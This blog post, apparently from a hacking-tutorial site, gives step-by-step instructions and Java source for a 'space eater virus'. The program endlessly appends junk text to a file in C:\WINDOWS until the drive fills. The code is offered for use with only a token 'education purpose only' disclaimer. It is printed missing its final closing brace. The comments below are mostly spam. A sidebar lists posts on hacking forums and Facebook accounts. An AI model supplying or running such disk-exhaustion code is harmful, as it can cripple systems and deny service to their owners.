CREATE AN SPACE EATER VIRUS USING JAVA

HEY GUYS. I'M BACK WITH SOME VIRUS PROGRAMMING IN JAVA. IT'S AMAZING THAT WITH SOME LITTLE LOGICAL CONCEPTS A SIMPLE PROGRAM CAN TURN INTO A VIRUS. HERE I'M GOING TO SHOW YOU HOW TO CREATE A SIMPLE SPACE EATER PROGRAM USING JAVA.
 


WARNING:- THIS IS FOR EDUCATION PURPOSE ONLY. I'M NOT RESPONSIBLE IN CASE OF ANY KIND OF MISUSE .


  WITHOUT MUCH DELAY LETS GET STARTED:

  • OPEN NOTEPAD AND TYPE THE FOLLOWING VIRUS CODE :
import java.io.*;
class Virus
{
public static void main(String ar[])
 {
   try
  {
   FileWriter f=new FileWriter("C:/WINDOWS/Virus.dll",true);
   while(true)
   {
   f.write("Programming Is Such A FUN !!!");
   }
  }
  catch(FileNotFoundException e){}
   catch(IOException e){}
 }
  • Save it as Virus.java
  • Now generate the byte code of program using Java Compiler.
  • When you execute this program It will start eating the space of your C drive. To stop this virus simply close the command window.
  • In order to recover the lost space of your drive. go to C:\WINDOWS and delete the file virus.dll (also from Recycle bin)
  •  
EXPLANATION:
ON EXECUTION THIS PROGRAM WILL CREATE A FILE CALLED VIRUS.DLL AT THE LOCATION C:\WINDOWS AND START INCREASING ITS SIZE BY SENDING THE JUNK DATA INTO IT WHICH AUTOMATICALLY INCREASE THE SIZE OF THE DISK.

TIP :-  YOU CAN TRY THIS ON YOUR COMPUTER TOO...... LOLL

Comments

  1. Thank you for the information provided by you relating to the process of writing the blog, it would be really helpful to the people who plan to start writing their own blog.

    Software Development Company Ahmedabad

    ReplyDelete
  2. Thanks but i think my PC doesn't like that too much xD. instead i'll write on my 1tb external Harddrive

    ReplyDelete
  3. Appilab is one of the top plumber booking app development company in the world. We offer on-demand plumber booking app script, at a most reasonable price.

    ReplyDelete
  4. Nice post thanks for sharing with us..
    If you have any requirement regarding App development like Android and iOS app development , so just click on link
    Best website development company India

    ReplyDelete

Post a Comment

Popular posts from this blog

HOW TO HACK VBULLETIN FORUMS

HACKING FACEBOOK ACCOUNTS LATEST TRICK

HOW TO COPY PROTECTED AUDIO CDS